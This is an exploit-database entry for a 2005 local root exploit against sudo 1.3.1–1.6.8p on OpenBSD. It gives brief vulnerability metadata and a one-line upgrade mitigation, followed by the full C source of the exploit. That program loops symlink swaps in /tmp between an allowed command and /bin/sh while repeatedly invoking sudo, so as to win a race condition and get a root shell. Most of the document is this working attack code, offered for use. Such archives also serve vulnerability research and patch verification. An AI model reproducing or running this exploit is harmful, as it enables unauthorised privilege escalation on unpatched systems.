OpenBSD sudo 1.3.1 - 1.6.8p local root exploit

vendor:

sudo

by:

__blf

7.2

CVSS

HIGH

Race Condition

362

CWE

Product Name: sudo

Affected Version From: 1.3.2001

Affected Version To: 1.6.8p

Patch Exists: YES

Related CWE: N/A

CPE: a:openbsd:sudo

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: OpenBSD

2005

OpenBSD sudo 1.3.1 – 1.6.8p local root exploit

OpenBSD sudo 1.3.1 - 1.6.8p is vulnerable to a local root exploit due to a race condition in path name. The exploit involves creating a symbolic link to the sudo command, and then deleting it and replacing it with a link to /bin/sh. This allows the attacker to gain root privileges.

Mitigation:

Upgrade to the latest version of OpenBSD sudo.

Source

Exploit-DB raw data:

#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <sysexits.h> 
#include <sys/wait.h> 

#define SUDO "/usr/bin/sudo" 
#ifdef BUFSIZ 
#undef BUFSIZ 
#define BUFSIZ 128 
#endif 

/* 
ANY MODIFIED REPUBLISHING IS RESTRICTED 
OpenBSD sudo 1.3.1 - 1.6.8p local root exploit 
Tested under OpenBSD 3.6 sudo 1.6.7p5 
Vuln by OpenBSD errata, http://www.openbsd.org/errata.html 
(c)oded by __blf 2005 RusH Security Team, http://rst.void.ru 
Race condition in path name, can take a while to exploit 
Gr33tz: x97Rang, whice, rsh, MishaSt, Inck-Vizitor, BlackPrince 
Fck lamerz: Saint_I, nmalykh 
All rights reserved. 
ANY MODIFIED REPUBLISHING IS RESTRICTED 
*/ 

int main (int argc, char ** argv) 
{ 
pid_t pid; 
void * buffer; 
char * exec, * race, * path; 
if(argc != 3) 
{ 
fprintf(stderr, "r57sudo.c by __blf\n"); 
fprintf(stderr, "RusH Security Team\n"); 
fprintf(stderr, "Usage: %s <sudo full path command> <sudo command>\n", 
argv[0]); 
fprintf(stderr, "e.g. ./r57sudo /bin/ls ls\n"); 
return EX_USAGE; 
} 
pid = fork(); 
if(pid == 0) 
{ 
while(1) 
{ 
exec = (char *)calloc(BUFSIZ, sizeof(char)); 
race = (char *)calloc(BUFSIZ, sizeof(char)); 
bzero(exec, sizeof(exec)); 
snprintf(exec, BUFSIZ, "ln -fs %s /tmp/%s", argv[1], argv[2]); 
system((char *)exec); 
bzero(race, sizeof(race)); 
snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]); 
system((char *)race); 
bzero(race, sizeof(race)); 
snprintf(race, BUFSIZ, "ln -fs /bin/sh /tmp/%s", argv[2]); 
system((char *)race); 
bzero(race, sizeof(race)); 
snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]); 
system((char *)race); 
} 
} 
if(pid > 0) 
{ 
while(1) 
{ 
path = (char *)calloc(BUFSIZ/2, sizeof(char)); 
snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]); 
system((char *)path); 
} 
} 
} 

// milw0rm.com [2005-07-04]